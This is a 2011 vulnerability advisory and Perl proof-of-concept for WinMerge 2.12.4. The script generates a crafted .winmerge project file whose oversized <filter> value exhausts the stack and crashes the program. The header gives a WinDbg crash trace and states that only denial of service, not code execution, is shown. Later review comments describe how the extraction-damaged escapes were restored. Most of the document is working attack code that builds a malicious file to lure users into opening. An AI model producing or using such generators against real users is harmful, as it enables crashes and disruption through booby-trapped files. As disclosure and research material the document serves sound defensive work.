# Title : WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability
# Published : 2011-02-22
# Author : LiquidWorm
#!/usr/bin/perl
#
#
# Title: WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability
#
#
# Vendor: Thingamahoochie Software
# Product web page: http://www.winmerge.org
# Affected version: 2.12.4.0 Unicode
#
# Summary: WinMerge is an Open Source differencing and merging tool for Windows.
# WinMerge can compare both folders and files, presenting differences in a visual
# text format that is easy to understand and handle. WinMerge is highly useful for
# determining what has changed between project versions, and then merging changes
# between versions. WinMerge can be used as an external differencing/merging tool
# or as a standalone application.
#
# Desc: WinMerge version 2.12.4 does not bound the length of user-supplied input
# when parsing the .winmerge project file format. A <filter> element holding an
# oversized string (roughly 700 KB of 'A' bytes in this PoC) exhausts the thread
# stack while the file is parsed: the attached WinDbg trace shows
# STATUS_STACK_OVERFLOW (0xC00000FD) with esp at the bottom of the stack region,
# followed by a C++ exception and an access violation in ntdll!strchr. This is
# consistent with stack exhaustion (e.g. deep recursion or a large stack
# allocation sized by the input) rather than a demonstrated overwrite of a
# fixed-size stack buffer. An attacker who lures a user into opening a crafted
# .winmerge file can crash the application (denial of service); the trace does
# not show control of eip, so arbitrary code execution is not demonstrated here.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# --------------------------------------------------------------------------------
#
# (e34.10b0): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000011 ebx=0001f83c ecx=50000161 edx=7ffe0300 esi=00000000 edi=00c30000
# eip=7c90cf78 esp=00033000 ebp=00033238 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# ntdll!NtAllocateVirtualMemory+0xa:
# 7c90cf78 ff12 call dword ptr [edx] ds:0023:7ffe0300={ntdll!KiFastSystemCall (7c90e510)}
# 0:000> g
# (e34.10b0): C++ EH exception - code e06d7363 (first chance)
# (e34.10b0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000d28 ebx=00523001 ecx=00000000 edx=00000000 esi=00000000 edi=00031ad8
# eip=7c90e8e5 esp=00030c9c ebp=000319d4 iopl=0 nv up ei pl nz ac pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# ntdll!strchr+0xd8:
# 7c90e8e5 53 push ebx
#
# --------------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2011-4997
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4997.php
#
#
# 08.02.2011
#
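use strict;
use warnings;

# Generator for the WinMerge 2.12.4 .winmerge project-file PoC described in the
# header above. It writes a project file whose <filter> element holds an
# oversized run of 'A' (0x41) bytes; opening that file in the affected version
# produced the STATUS_STACK_OVERFLOW / access-violation trace quoted above.
#
# NOTE(review): the listing as published on this page had every backslash
# stripped by extraction ("x3C" where the author wrote "\x3C", "n" for "\n"),
# so it emitted literal hex text instead of XML and the PoC did not reproduce.
# The payload is restored below as plain ASCII; the bytes are exactly what the
# original hex escapes decode to, CRLF line endings included.

my $project = 'thricer.winmerge';

# Number of times the 216-byte filler chunk is written into <filter>.
# Kept as the author's expression: 2391 - 142 + 1000 = 3249 repetitions,
# i.e. about 700 KB of filler.
my $repeat = 2391 - 142 + 1000;

# Prologue: XML declaration, project root and the opening <filter> tag.
my $begining = qq{<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n\r\n}
             . qq{<project>\r\n}
             . qq{   <paths>\r\n}
             . qq{      <filter>};

# Filler chunk: 216 x 'A' (0x41), the same length as the original hex string.
my $load = 'A' x 216;

# Epilogue: a "*.*" suffix closes the filter value, then the remaining
# project elements in the layout WinMerge itself writes.
my $ending = qq{*.*</filter>\r\n}
           . qq{      <subfolders>0</subfolders>\r\n}
           . qq{      <left-readonly>0</left-readonly>\r\n}
           . qq{      <right-readonly>0</right-readonly>\r\n}
           . qq{   </paths>\r\n}
           . qq{</project>\r\n};

print "\n\n[*] Buffering \"$project\" file ...\n";

# Three-arg open on a lexical handle, joined with low-precedence 'or' so a
# failed open really dies. The original used '||', which bound to the filename
# string (always true) and never checked open()'s return value.
open my $fh, '>', "./$project"
    or die "\nCan't open $project: $!";

# The payload carries CRLF line endings by construction; on a Windows Perl a
# text-mode handle would rewrite each "\n" to "\r\n" and corrupt them.
binmode $fh;

# 'x' binds tighter than '.', so the filler is repeated and then concatenated
# between prologue and epilogue, as in the original one-liner.
print {$fh} $begining . ( $load x $repeat ) . $ending
    or die "\nCan't write $project: $!";

# Buffered write errors (e.g. disk full) only surface at close.
close $fh
    or die "\nCan't close $project: $!";

sleep 2;
print "\n[*] File created successfully!\n\n";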